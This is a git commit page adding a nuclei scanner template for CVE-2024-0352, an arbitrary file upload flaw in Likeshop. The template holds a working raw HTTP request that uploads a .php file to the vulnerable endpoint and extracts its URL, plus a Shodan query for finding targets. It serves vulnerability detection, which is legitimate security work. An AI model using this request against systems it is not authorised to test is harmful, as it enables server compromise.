daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #8924 from juicewrldxxx/cve-2024-0352 

Added CVE-2024-0352 Template
patch-1
Dhiyaneshwaran 2024-01-10 21:17:15 +05:30 committed by GitHub
parent f10e6f40b8 e1216d096d
commit 0ad7142996
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 56 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

56
http/cves/2024/CVE-2024-0352.yaml Normal file
View File

@ -0,0 +1,56 @@
id: CVE-2024-0352
info:
name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload
author: CookieHanHoan,babybash,samuelsamuelsamuel
severity: high
description: |
A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
impact: |
The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
remediation: Update to the latest version
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-0352
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
cvss-score: 7.3
cve-id: CVE-2024-0352
cwe-id: CWE-434
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:874152924
vendor: likeshop
tags: cve,cve2024,rce,file-upload,likeshop,instrusive
variables:
filename: "{{rand_base(6)}}"
http:
- raw:
- |
POST /api/file/formimage HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="{{filename}}.php"
Content-Type: application/x-php
{{randstr}}
------WebKitFormBoundarygcflwtei--
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "\"name\":\"{{filename}}.php\"")'
- 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")'
condition: and
extractors:
- type: json
part: body
json:
- ".data.url"